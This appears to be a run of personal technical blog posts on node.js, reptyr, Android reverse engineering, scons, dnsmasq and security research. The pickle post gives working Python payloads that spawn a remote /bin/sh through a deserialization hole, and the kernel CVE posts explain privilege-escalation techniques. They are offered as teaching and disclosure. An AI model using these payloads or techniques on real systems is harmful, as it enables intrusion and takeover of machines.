Why node.js is cool (it’s not about performance)

For the past N months, it seems like there is no new technology stack that is either hotter or more controversial than node.js. node.js is cancer! node.js cures cancer! node.js is bad ass rock star tech!. I myself have given node.js a lot of shit, often involving the phrase “explicit continuation-passing style.”

Most of the arguments I’ve seen seem to center around whether node.js is “scalable” or high-performance, and the relative merits of single-threaded event loops versus threading for scaling out, or other such noise. Or how to best write a Fibonacci server in node.js (wat?).

I am going to completely ignore all of that (and I think you should, too!), and argue that node.js is in fact on to something really cool, and is worth using and thinking about, but for a reason that has absolutely nothing to do with scalability or performance.

The Problem

node.js is cool because it solves a problem shared by virtually every mainstream language. That problem is the fact that, as long as “ordinary” blocking code is the default, it is difficult and unnatural to write networked code in a way that it can be combined with other network code, while allowing them to interact.

In most languages/environments — virtually every other language people use today — when you write networked code, you can either make it fully blocking itself, and implement your own main loop — which is almost always easiest — or you can pick your favorite event loop library (you probably have half a dozen choices), and write your code around that. If you do the latter, not only will your code likely be more awkward than if you chose the blocking main loop approach, but your only reward for the effort is that your code is combinable with the small fraction of other code that also chose the same event loop library.

The upshot of this situation is that if you pick a couple of random networked libraries written by different people — let’s say, an HTTP server, a Twitter client, and an IRC client, for example — and want to combine them — maybe you want a Twitter < -> IRC bridge with a web-based admin panel — you will end up at best having to write some awkward glue code, and at worst doing something truly hackish in order to make them communicate at all.

(In case you’re not convinced about the existence or scope of this problem, you can detour ahead to the optional example of how this problem manifests with typical Python libraries)

Enter node.js

node.js solves this problem, somewhat paradoxically by reducing the number of options available to developers. By having a built-in event loop, and by making that event loop the default way to accomplish virtually anything at all (e.g. all of the builtin IO functions work asynchronously on the same event loop), node.js provides a very strong pressure to write networked code in a certain way. The upshot of this pressure is that, since essentially every node.js library works this way, you can pick and choose arbitrary node.js libraries and combine them in the same program, without even having to think about the fact that you’re doing so.

node.js is cool, then, not for any performance or scalability reasons, but because it makes composable networked components the default.

Concluding Notes

An interesting point here is that there is not really any fundamental differences between what you can do in Python and node.js. The Twisted project, for example, is basically an attempt to implement the node.js ideology in Python (yes, I’m being terribly anachronistic describing it that way). Twisted, however, has a fairly steep learning curve, and “feels” unnatural to developers used to writing “normal” Python, and so relatively few libraries get written for the Twisted environment, compared to the rest of the Python ecosystem. Twisted suffers from the fact that the Python language and Python community are not set up to make Twisted the default way to do things.

The key is that node.js makes it, both technically and socially, easier to write code in this composable way than not to do so. The built-in event loop and nonblocking primitives make it technically easy, and the social culture that has grown up around it discourages libraries that don’t work this way, so libraries that attempt to just block for IO are looked down on and are unlikely to thrive and gain adoption and development resources.

I’m also not ignoring the downside of the node.js style — the potentially convoluted callback-based style, the risk of bringing the whole world to a halt with an accidental blocking call, the single-threaded model that makes it hard to effectively exploit multiple cores. node.js definitely makes you do more work than you might otherwise have to, in many circumstances. But the key is, in exchange for this work, you get something really cool — and something much more valuable, in my opinion, than nebulous performance gains.

I also don’t want to claim that node.js is the only system, or the only technical approach, that makes this property possible. But node.js is the most successful such system I know of, and that’s worth at least as much as the technical possibility — what’s the use of being able to combine third-party libraries, if no one has written anything worth using in the first place?

And similarly, while the single-threaded callback model may not be the best possible model, it seems to have hit some sweet spot for finding a sweet spot in terms of what developers are willing to put up with. Certainly, people are writing node.js code like mad — check out the npm registry for a partial list.

So, node.js is not magic, and it definitely doesn’t cure cancer. But there is something here worth looking at. The next time you need to glue some unrelated networked services together, give node.js a shot – I think you’ll like it. And if you’re still not convinced, glue a quick HTTP frontend onto whatever you’ve created. I promise you’ll be shocked by how easy it is.

Postscript – A Python Example

As an optional addendum, here’s a step-by-step discussion of how just bad the situation is in most other languages.

Let’s imagine we want to write a trivial Jabber -> IRC bridge: A bot that lurks in an IRC channel, and signs on to Jabber, and sends all the messages it receives on Jabber into the IRC channel. This is the kind of simple problem that can be described in one sentence, and sounds like it should take all of 20 lines of code, but actually turns out to be rather a nuisance.

Python has, by this point, a great library ecosystem, so we happily start googling, and find the plausible looking python-irclib and xmpppy libraries. Great. So, what does code in each of those look like? Well, in python-irclib, we construct a subclass of SingleServerIRCBot, and call the start function, which runs the IRC main loop:

bot = MyBot(channel, nickname, server, port)
bot.start()

And in xmpppy, we construct an xmpp.Client object, and call Client.Process in a loop, with a timeout:

conn = xmpp.Client(server)
# connect to the server
while True:
  conn.Process(1)

Ok, so, we launch a thread for each one, and a few minutes of fumbling later, we’re connected to both Jabber and IRC. So far, so good. We’re using Python’s threads, which will inevitably bring us a world of pain, but I’ll ignore that for now, since a better threading implementation could fix most of the pain.

But now, what do we do when we receive a Jabber message? We want to send a message out the python-irclib instance, but how do we do that? python-irclib isn’t thread safe, so we can’t just call .send() from the Jabber thread. Ok, so we add in a Queue.Queue, and have the Jabber thread push messages onto it.

Now we just need to make the IRC thread fetch messages from this queue. But how do we do that? The IRC thread is blocked somewhere deep inside python-irclib, waiting for network traffic. How do we wake it up to read messages from the queue? The easiest way is to switch from calling start to calling process_once in a loop with a short timeout.

This will work, and we’ll eventually get something working, but now we’re forced into polling, with all the annoying latency/CPU tradeoffs that entails, and also half of our code so far has just been spent gluing these two libraries together.

In node.js, on the other hand, we’d just instantiate client objects for both protocols, set up some event handlers, and … well, that’s about it. Because everything’s hooked into the same main loop, they’ll Just Work together, and because we’re all running single-threaded, we can mostly just communicate directly between the two libraries without having to think too hard about race conditions or anything.

The point, of course, is not that this is impossible to write this program in Python. It is, and I’ve done it, and it’s not that terrible. But any option you take will involve some annoying tradeoffs, and will involve making lots of irrelevant plumbing decisions about how to make your pieces play well together. And compared to all that, node.js feels like a breeze.

BlackHat/DEFCON 2011 talk: Breaking out of KVM

I’ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux.

[Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you’ll need to get the exploit up and running in a local test environment, if you’re so inclined.

In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I’m also going to clean that up and release it, but don’t expect it too soon.

I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I’d met online and others I hadn’t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.

Aug 8th, 2011

Exploiting misuse of Python’s “pickle”

If you program in Python, you’re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you’re also familiar with the warning printed prominently near the start of pickle‘s documentation:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it’s interesting if you haven’t seen it.

The Target

The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:

class VulnerableProtocol(protocol.Protocol):
  def dataReceived(self, data):
 
     # Code to actually parse incoming data according to an
     #  internal state machine
     # If we just finished receiving headers, call verifyAuth() to
       check authentication
 
  def verifyAuth(self, headers):
    try:
      token = cPickle.loads(base64.b64decode(headers['AuthToken']))
      if not check_hmac(token['signature'], token['data'], getSecretKey()):
        raise AuthenticationFailed
      self.secure_data = token['data']
    except:
      raise AuthenticationFailed

So, if we just send a request that looks something like:

AuthToken: <pickle here>

The server will happily unpickle it.

Executing Code

So, what can we do with that? Well, pickle is supposed to allow us to represent arbitrary objects. An obvious target is Python’s subprocess.Popen objects — if we can trick the target into instantiating one of those, they’ll be executing arbitrary commands for us! To generate such a pickle, however, we can’t just create a Popen object and pickle it; For various mostly-obvious reasons, that won’t work. We could read up on the “pickle” format and construct a stream by hand, but it turns out there is no need to.

pickle allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method, which should return either a string or a tuple describing how to reconstruct this object on unpacking. In the simplest form, that tuple should just contain

  • A callable (which must be either a class, or satisfy some other, odder, constraints), and
  • A tuple of arguments to call that callable on.

pickle will pickle each of these pieces separately, and then on unpickling, will call the callable on the provided arguments to construct the new object.

And so, we can construct a pickle that, when un-pickled, will execute /bin/sh, as follows:

import cPickle
import subprocess
import base64
 
class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))
 
print base64.b64encode(cPickle.dumps(RunBinSh()))

Getting a Remote Shell

At this point, we’ve basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.

For completeness, I’ll explain what I did, since it’s a moderately cute trick. subprocess.Popen lets us select which file descriptors to attach to stdin, stdout, and stderr for the new process by passing integers for the stdin and similarly-named arguments, so we can open our /bin/sh on arbitrarily-numbered fd’s.

However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can’t necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.

It also means, however, that every time we connect to the server, we’ll open a new socket inside the same server process. So, let’s guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server’s socket 20 times, that will open 20 new file descriptors in the server. Since they’ll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:

import cPickle
import subprocess
import base64
 
class Exploit(object):
  def __reduce__(self):
    fd = 20
    return (subprocess.Popen,
            (('/bin/sh',), # args
             0,            # bufsize
             None,         # executable
             fd, fd, fd    # std{in,out,err}
             ))
 
print base64.b64encode(cPickle.dumps(Exploit()))

We’ll open a /bin/sh on fd 20, which should be one of our 20 connections, and if all goes well, we’ll see a prompt printed to one of those. We’ll send some junk on that fd until we manage to get the original server to error out and close the connection, and we’ll be left talking to /bin/sh over a socket. Game over.

In Conclusion

Again, nothing here should be novel, nor would I expect any of these pieces to take a competent hacker more than few minutes to figure out, given the problem. But if this blog post teaches someone not to use pickle on untrusted data, then it will be worth it.

Mar 20th, 2011

reptyr: Changing a process’s controlling terminal

reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of our own choosing, in order to open the new terminal, and dup2(2) it over stdout and stderr.

The main special feature of reptyr is that it actually changes the controlling terminal of the target process. The “controlling terminal” is a concept maintained by UNIX operating systems that is independent of a process’s file descriptors. The controlling terminal governs details like where ^C gets delivered, and how applications are notified of changes in window size.

Processes are grouped into two levels of hierarchical groups: sessions, and process groups. Each group is named by an ID, which is the PID of the initial leader (either “session leader” or “process group leader”). Even if the leader exits, that number is still the ID for the group. Sessions are used for terminal management — Every process in a session has the same controlling terminal, and each terminal belongs to at most one session. Process groups are a sub-division within sessions, and are used primarily for job control within the shell. For a more in-depth explanation, see part 3 of my earlier series on termios.

If you check out tty_ioctl(4), you’ll find that Linux has an ioctl, TIOCSCTTY, that can be used to set the controlling terminal of a process, and you could be forgiven for thinking that all we need is to make the target call that ioctl, and we’re done.

However, if we read closer, we find that it has several restrictions. In particular:

The calling process must be a session leader and not have a controlling terminal already. If this terminal is already the controlling terminal of a different session group then the ioctl fails with EPERM […]

In the typical case, where I’m trying to attach a (say) mutt that you spawned from your shell, mutt won’t be a session leader — your shell will be the session leader, and mutt will be the process group leader for a process group containing only itself.

So, we need to make the target a session leader. Conveniently, there’s a system call for that: setsid(2).

However, reading that man page, we find a new caveat: setsid(2) fails with EPERM if

The process group ID of any process equals the PID of the calling process. Thus, in particular, setsid() fails if the calling process is already a process group leader.

The shell creates a new process group for every job you launch, and so our target mutt will be a process group leader, and unable to setsid(). The usual solution for programs that want to setsid is to fork(), so that the child is still in the parent’s session and process group, and then setsid() in the child. However, fork()ing our mutt and killing off the parent seems potentially disruptive, so let’s see if we can avoid that.

So, we’re going to need to change mutt‘s process group ID, so that there are no processes with process group IDs equal to its PID. Following some trusty SEE ALSO links, we get to setpgid(2). There’s a bunch of text in that man page, but the key bit is:

If setpgid() is used to move a process from one process group to another, both process groups must be part of the same session (see setsid(2) and credentials(7)). In this case, the pgid specifies an existing process group to be joined and the session ID of that group must match the session ID of the joining process.

We need to find a process group in the same session as mutt to move our mutt into, and then we’ll be able to setsid. We could try to find one — the shell is a plausible candidate, for instance — but there’s an alternate, more direct route: Create one.

While we have mutt captured with ptrace, we can make it fork(2) a dummy child, and start tracing that child, too. We’ll make the child setpgid to make it into its own process group, and then get mutt to setpgid itself into the child’s process group. mutt can then setsid, moving into a new session, and now, as a session leader, we can finally ioctl(TIOCSCTTY) on the new terminal, and we win.

It turns out I didn’t invent this technique — injcode and neercs work the same way. But I did discover it independently of them, and it was a fun little hunt through unix arcana.

Feb 8th, 2011

reptyr: Attach a running process to a new terminal

Over the last week, I’ve written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don’t want to interrupt it? Just start a screen, use reptyr to grab it, and then kill the ssh session and head on home.

You can grab the source, or read on for some more details.

There’s a shell script called screenify that’s been going around the internet for nigh on 10 years now that is supposed to use gdb to accomplish the same thing. There’s also a project called retty that tries to do the same thing, in C using ptrace() directly.

The difference between those programs and reptyr is that reptyr works much, much, better.

If you attach a less using screenify or retty, it will still take input from the old terminal. If you attach an ncurses program, and resize the window, the program probably won’t resize correctly. ^C and ^Z will still be processed on the old terminal — typing them in the new terminal won’t do anything useful.

reptyr fixes all of these problems and more, and is the only such tool I know of that does so. I’ve never seen a program that doesn’t behave noticeably incorrectly after attaching with retty or screenify, whereas with reptyr most programs I have tried work flawlessly.

How does it work?

reptyr works in the same basic way as screenify and retty — it attaches to the target process using the ptrace API, opens the new terminal, and dup2s it over the old file descriptors. It also copies the termios settings from the old terminal to the new terminal.

The main thing that reptyr does that no one else does is that it actually changes the controlling terminal of the process you are attaching. This is the detail that makes many things Just Work, including ^C and ^Z and window resizing.

Switching the target’s controlling terminal is not easy and involves a fair bit of trickery with ptrace and Linux’s terminal APIs. I will probably do another blog post some time about the dirty details of how I make this work, but for now you can check out attach.c if you really want to know.

reptyr still has a number of limitations — it doesn’t generally work, for example, if the target process has any children. I know how to fix most of these problems, though, so expect it to get better with time. Please let me know if you find it useful!

Appendix

(Edited to add:) Nothing is really new. A commenter on reddit pointed out that injcode and neercs both accomplish the same thing, even using the same trick to change the CTTY. Ah well, I had run writing it anyways, and apparently I wasn’t the only one who didn’t know about the existing alternatives. neercs is a full screen replacement, though, and I think that reptyr should be more robust than injcode — I use a different techique for ptrace-hijacking, for example — and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I’ve seen for this tool, this still isn’t a problem that is solved to the average user’s satisfaction.

Jan 21st, 2011

Some Android reverse-engineering tools

I’ve spent a lot of time this last week staring at decompiled Dalvik assembly. In the process, I created a couple of useful tools that I figure are worth sharing.

I’ve been using dedexer instead of baksmali, honestly mainly because the former’s output has fewer blank lines and so is more readable on my netbook’s screen. Thus, these tools are designed to work with the output of dedexer, but the formats are simple enough that they should be easily portable to smali, if that’s your tool of choice (And it does look like a better tool overall, from what I can see).

ddx.el

I’m an emacs junkie, and I can’t stand it when I have to work with a file that doesn’t have an emacs mode. So, a day into staring at un-highlighted .ddx files in fundamental-mode, I broke down and threw together ddx-mode. It’s fairly minimal, but it provides functional syntax highlighting, and a little support for navigating between labels. One cute feature I threw in is that, if you move the point over a label, any other instances of that label get highlighted, which I found useful in keeping track of all the “lXXXXX” labels dedexer generates.

An example file (from k9mail) highlighted using ddx-mode

ddx2dot

Dalvik assembly is, on the whole pretty easy to read, but occasionally you stumble on huge methods that clearly originated from multiple nested loops and some horrible chained if statements. And what you’d really like is to be able to see the structure of the code, as much as the details of the instructions.

To that end, I threw together a Python script that “parses” .ddx files, and renders them to a control-flow graph using dot. As an example, the parseToken method from the IMAP parser in the k9mail application for Android looks like the following, when disassembled and rendered to a CFG:

A CFG for k9mail's ImapResponseParser.parseToken method

I use the term “parses” because it’s really just a pile of regexes, line.split() and line.startswith("..."), but it gets the job done, so I hope it might be of use to someone else. The biggest missing feature is that it doesn’t parse catch directives, so those just end up floating out to the side as unattached blocks.

You’ll also notice the rounded “return” blocks — either javac or dx merges all exits from a function to go through the same return block, but I found that preserving that feature in the CFG produces a lot of clutter and makes it hard to read, so I lift every edge that would go to that common block to go to a separate block.

Github

Both tools live in my “reverse-android” repository on github, and are released under the MIT license. Please feel free to do whatever you want with them, although I’d appreciate it if you let me know if you make any improvements or find them useful.

CVE-2010-4258: Turning denial-of-service into privilege escalation

Dan Rosenberg recently released a privilege escalation bug for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I’m going to do a brief tour of the various kernel features that collided to make this bug possible, and explain how they combine to turn an otherwise-boring oops into privilege escalation.

access_ok

When a user application passes a pointer to the kernel, and the kernel wants to read or write from that pointer, the kernel needs to perform various checks that a buggy or malicious userspace app hasn’t passed an “evil” pointer.

Because the kernel and userspace run in the same address space, the most important check is simply that the pointer points into the “userspace” part of the address space. User applications are protected by page table permissions from writing into kernel memory, but the kernel isn’t, and so must explicitly check that any pointers given to it by a user don’t point into the kernel region.

The address space is laid out such that user applications get the bottom portion, and the kernel gets the top, so this check is a simple comparison against that boundary. The kernel function that performs this check is called access_ok, although there are various other functions that do the same check, implicitly or otherwise.

get_fs() and set_fs()

Occasionally, however, the kernel finds it useful to change the rules for what access_ok will allow. set_fs()1 is an internal Linux function that is used to override the definition of the user/kernel split, for the current process.

After a set_fs(KERNEL_DS), no checking is performed that user pointers point to userspace — access_ok will always return true. set_fs(KERNEL_DS) is mainly used to enable the kernel to wrap functions that expect user pointers, by passing them pointers into the kernel address space. A typical use reads something like this:

old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &pos);
set_fs(old_fs);

vfs_readv expects a user-provided pointer, so without the set_fs(), the access_ok() inside vfs_readv() would fail on our kernel buffer, so we use set_fs() to effectively temporarily disable that checking.

Kernel oopses

When the kernel oopses, perhaps because of a NULL pointer dereference in kernelspace, or because of a call to the BUG() macro to indicate an assertion failure, the kernel attempts to clean up, and then tries to kill the current process by calling the do_exit() function to exit the current process.

When the kernel does so, it’s still running in the same process context it was before the oops occured, including any set_fs() override, if applicable. Which means that do_exit will get called with access_ok disabled — not something anyone expected when they wrote the individual pieces of this system.

clear_child_tid

As it turns out, do_exit contains a write to a user-controlled address that expects access_ok to be working properly!

clear_child_tid is a feature where, on thread exit, the kernel can be made to write a zero into a specified address in that thread’s address space, in order to notify other threads of that exit.

This is implemented by simply storing a pointer to the to-be-zeroed address inside struct task_struct (which represents a single thread or process), and, on exit, mm_release, called from do_exit, does:

put_user(0, tsk->clear_child_tid);

This is normally safe, because put_user checks that its second argument falls into the “userspace” segment before doing a write. But, if we are running with get_fs() == KERNEL_DS, it will happily accept any address at all, even one pointing into kernel space.

So, if we find any kernel BUG() or NULL dereference, or other page fault, that we can trigger after a set_fs(KERNEL_DS), we can trick the kernel into a user-controlled write into kernel memory!

splice() et. al.

An obvious question at this point is: How much of the kernel can an attacker cause to run with get_fs() == KERNEL_DS?

There are a number of small special cases. For example, the binary sysctl compatibility code works by calling the normal /proc/ write handlers from kernelspace, under set_fs(). handful of compat-mode (32 on 64) syscalls work similarly.

By far the biggest source I’ve found, however, is the splice() system call. The splice() system call is a relatively recent addition to Linux, and allows for zero-copy transfer of pages between a pipe and another file descriptor.

As of 2.6.31, attempts to splice() to or from an fd that doesn’t support special handling to actually do zero-copy splice, will fall back on doing an ordinary read(), write(), or sendmsg() on the fd … from the kernel, using set_fs() in order to pass in kernel buffers.

What that means it that by using splice(), an attacker can call the bulk of the code in most obscure filesystems and socket types (which tend not to have explicit splice() support) with a segment override in place. Conveniently for an attacker, that is also exactly a description of where the bulk of the random security bugs tend to be.

This is also exactly the technique Dan’s exploit uses. He uses CVE-2010-3849, an otherwise boring NULL pointer dereference I reported in the Econet network protocol. His exploit code does a splice() to an econet socket, causing the econet_sendsmg handler to get called under set_fs(KERNEL_DS). When it oopses, do_exit is called, and he gets a user-controlled write into kernel memory. Everything else is just details.

Footnotes:

1 Back in Linux 1.x, this function actually set the %fs register on i386. It hasn’t in years, but it’s used in too many places for changing the name to be worth it.

Dec 10th, 2010

Some notes on CVE-2010-3081 exploitability

Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered an announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time.

While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE were wrong, and it was even more broadly exploitable than was publically documented. I’d like to share those observations here.

A brief review of the bug

The bug arose from the compat_alloc_user_space function in Linux’s 32-bit compatibility support on 64-bit systems. compat_alloc_user_space allocates and returns space on the userspace kernel stack for the kernel to use:

static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs->sp - len;
}

This function is only called by compat-mode syscalls, so current is assumed to be a 32-bit process, in which case regs->sp, the user stack pointer, will be a 32-bit quantity. This, if we subtract a small len, the result should still fit in 32 bits, which, on a 64-bit system means it is guaranteed to fall within the user address space.

Because of this, some callers of compat_alloc_user_space were lazy, and did not call access_ok (or a function which called access_ok) to check that the result of compat_alloc_user_space fell within the user address space.

However, it turned out that some call sites in the kernel called compat_alloc_user_space with a user-controlled len value, allowing the subtraction to wrap around. On a 64-bit system, the kernel lives in the top four gigabytes of memory, and so this wraparound is enough for a user to cause compat_alloc_user_space to return a pointer into the kernel’s address space.

Moreover, it turned out that the functions that used a user-controlled len also did not check access_ok on the result of the allocation. In particular, Linux 2.6.26 introduced the compat_mc_getsockopt function, which called compat_alloc_user_space with a user-controlled length and then copied user-controlled data to this pointer. It is this function which the public exploit targetted.

Disabling 32-bit binaries doesn’t help

When an exploit was released for this bug, many sources circulated a mitigation: Disable 32-bit binaries on a system. Prevent compat-mode processes from running, the logic goes, and you prevent anyone from making a compat-mode syscall that triggers the vulnerable path.

This mitigation indeed prevented the public exploit from working (it included 32-bit inline assembly, and so couldn’t even easily be recompiled as a 64-bit binary), and many observers seemed to believe it closed the bug entirely.

However, this was not the case! It turns out, on an amd64 system, a 64-bit process can still make a compat-mode system call using the int $0x80 instruction, which is the traditional 32-bit syscall mechanism! Even though the process is running in 64-bit mode, int $0x80 redirects to the compat-mode syscall table.

After realizing this, modifying the public exploit to work when compiled in 64-bit mode was a simple matter of porting the inline assembly, and changing a small handful of types. I’ve posted the modified exploit and the diff against the original for the curious.

The integer overflow is totally irrelevant

Once you’ve realized that you can make compat-mode system calls from a 64-bit process, a little bit of thought reveals something else interesting. compat_alloc_user_space subtracts the len value off of the userspace stack pointer. Previously, we relied on subtracting a large value from a 32-bit stack pointer in order to end up with a kernel pointer. However, while a 32-bit is limited to a 32-bit stack pointer, a 64-bit process can write a full 64-bit value into %rsp, and thus regs->sp! There’s no need for underflow at all — you can just write a 64-bit value into %rsp and do an int $0x80, and make compat_alloc_user_space return any value you please!

The condition for exploitability thus drops from “user-controlled len and no access_ok” to simply “no access_ok“.

This is interesting, because it turns out that some very old kernels, before 2.6.11, including RHEL 4, have the following function:

int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&u_ifreq64->ifr_ifrn.ifrn_name[0], &tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &u_ifreq64->ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}

Remember, we can make compat_alloc_user_space return an arbitrary value. The copy_to_user will call access_ok and fail, but that return value will be discarded, and the __put_user will scribble 32 bits of user-controlled data at a user-controlled address. Bingo, local root.

It turns out this function was present in Linux 2.4.x, too, meaning that this exploit even affected RHEL3 and anyone else still running a 2.4-based system!

Based on this exploit, I’ve produced a working proof-of-concept exploit for RHEL4, based on the released exploit for RHEL5. Contact me if you’re interested, but it’s pretty straightforward.

Closing notes

As far as I know, neither of these facts has been publically documented prior to this post. I shared this information with Red Hat, and they requested I keep it private until they released fixes for RHEL 3, which happened last week. I would not be at all surprised to learn that someone else has private exploits that incorporate either or both of these observations, though.

One important moral here is you must be very careful when declaring a system unaffected by a vulnerability, or declaring a mitigation to be complete. Software systems have gotten tremendously complex, and it’s often impossible to be totally confident you understand every last way an attacker could tickle a vulnerability.

Nov 30th, 2010

Why scons is cool

I’ve recently started playing with scons a little for some small personal projects. It’s not perfect, but I’ve rapidly come to the conclusion that it’s a probably far better choice than make in many cases. The main exceptions would be cases where you need to integrate into legacy build systems, or if asking or expecting developers to have scons installed is unreasonable for some reason.

The main reason that scons is cool to me, and the thing that makes it fundamentally different from make, is the introduction of actual scoping.

make has a single global scope. This is one of the main reasons that people write recursive Makefiles; By giving you one file per directory, you get one scope per directory, which makes it possible to have per-directory pattern rules, variables, and all that other stuff, without driving yourself insane.

make‘s awful syntax, confusing varieties of variable, whitespace-sensitivity, and all the other things that people love to bitch about are annoying, but to my mind, the single scope that makes recursive Makefiles the dominant (and, really, the only scalable) paradigm is the one thing that really sucks.

scons solves this by baking various kinds of scoping into the tool. scons lets you include sub-build-scripts (typically named SConscript, by convention). Those scripts run in their own namespace and can establish their own variables, rules, etc., but the end result is then merged back into the global rule list (handling sub-directory paths intelligently), so that the scheduler can work globally, instead of having to recurse.

Furthermore, because of this explicit scoping, you can pass variables, including targets, between build files, letting you explicitly set up cross-directory dependencies or share CFLAGS or other variables, making it easy for different directories to share exactly as much or as little configuration as you want.

In addition, scons has the concept of “build environments”, which are objects that include build rules, variables, and so on. By reifying what make just represents as the global environment into objects, it makes it much easier to scope and program things. For example, if you have a set of targets that should be built using the global default rules, except with debugging enabled, you can do:

myenv = env.Clone()
myenv.Append(CFLAGS = ['-g'])
myenv.Program(...)

By making it (optionally) explicit which sets of rules and variables are being used in each place, it becomes much easier to share multiple kinds of targets and rule sets in a single file, without necessitating lots of sub-files just for scoping, like make tends to lead to.

scons is cool for a bunch of reasons. It eliminates most of the stupid little annoyances you’ve probably had with make. But, in my mind, this is the thing that makes it cool. They’ve added sane scoping to the build tool, so that you can construct non-recursive build systems without going insane.

I’ll definitely be considering scons for any new projects I write going forward. I hate make, and this definitely feels like a path forward.

Nov 7th, 2010
Tags: , , , ,

Configuring dnsmasq with VMware Workstation

I love VMware workstation. I keep VMs around for basically every version of every major Linux distribution, and use them heavily for all kinds of kernel testing and development.

This post is a quick writeup of my networking setup with VMware Workstation, using dnsmasq to assign my VMs addresses and provide a DNS server to resolve VM addresses.

The objective

I want to be able to resolve my VM’s hostnames so that I can ssh to them, or run other network services and access them from the host. I could just assign static addresses and put them in /etc/hosts, but that’s totally lame, and liable to be a source of error and frustration, because I have dozens of VMs, and add and remove them frequently.

We’re going to set things up so that when VMs get addresses from DHCP, their hostnames automatically become resolvable, using the .vmware domain. To do this, we’re going to set up a piece of software called dnsmasq, which is a flexible DNS and DHCP server, designed for basically exactly this purpose.

The setup

Because I use my VMs for local testing, I just keep most of them on a local NAT on my machine. I configure that virtual network inside VMware as follows (run vmware-netconfig, or follow the appropriate menus):

Note how I disable “Use local DHCP service to distribute IP addresses to VMs” — we’re going to set up dnsmasq to prove DHCP, so we don’t want it fighting with VMware’s.

Notice that the subnet I’m using here is 172.16.37.* — if you choose a different one, you’ll need to adjust accordingly later.

Configuring dnsmasq

Then, I install dnsmasq, and configure /etc/dnsmasq.conf as follows:

listen-address=172.16.37.1
listen-address=127.0.0.1
no-dhcp-interface=lo

server=192.168.1.1
local=/vmware/

no-hosts
no-resolv

domain=vmware
dhcp-fqdn

dhcp-range=172.16.37.3,172.16.37.200,12h
dhcp-authoritative
dhcp-option=option:router,172.16.37.2

Here’s what each of those lines mean, in order:

listen-address=172.16.37.1
listen-address=127.0.0.1
no-dhcp-interface=lo

We don’t want dnsmasq serving DHCP or DNS to the outside world or other virtual networks, so we only tell it to listen on the local interface — so that we can talk to it from the host — and to the virtual network we set up in the previous step. We don’t want it serving DHCP to localhost, though, so we tell it not to.

server=192.168.1.1
local=/vmware/

Here we tell dnsmasq how to forward DNS requests to the outside world. We’re going to be using dnsmasq as our primary nameserver, and having it forward requests for things it doesn’t understand to a real DNS server. In my case, that’s my LAN’s router, at 192.168.1.1. The local line tells dnsmasq that the .vmware domain is local, and it should never forward requests to resolve things in that domain.

If I needed something more complicated, it might be possible to use the resolv-file option or similar, but I don’t, personally.

no-hosts
no-resolv

These options tell dnsmasq not to look at resolv.conf or /etc/hosts when resolving names — we want it only to resolve VMs itself, and to forward everything else.

domain=vmware
dhcp-fqdn

This tells dnsmasq to assign the .vmware domain to hosts it hands out DHCP to, so that we can resolve VMs in the .vmware domain.

dhcp-range=172.16.37.3,172.16.37.200,12h
dhcp-authoritative

And finally, we configure the DHCP server. We give it a range of addresses to assign on the subnet we created earlier. I stop at .200, so that I can leave the last few open for static IPs if I need for some reason, and we start at .3.1 is the host, and .2 is the address of VMware’s router. dhcp-authoritative enables some optimizations when dnsmasq knows it is the only DHCP server around.

dhcp-option=option:router,172.16.37.2

Finally, we need dhcp-option to tell DHCP clients to use the VMware-provided router at .2 as their gateway, instead of using the host, at .1. We could configure the host to be a NAT server using Linux’s NAT, but that’s outside the scope of this document.

Configuring the host

Now, we need to configure the host to use dnsmasq as our DNS server. This is a simple matter of telling the host to use 127.0.0.1 as our DNS server, and to add .vmware to our search path. If we’re editing resolv.conf directly, it would look like:

search vmware
nameserver 127.0.0.1

Configuring guests

We need to configure our guests to send a hostname along with their DHCP requests, so that dnsmasq can add them to its address table. How to do this varies by OS, but most modern OSes do it automatically. If they don’t, here are a few hints:

For RHEL-based distros, edit /etc/sysconfig/network-scripts/ifcfg-INTERFACE, and add a line like

 DHCP_HOSTNAME=centos-5-amd64

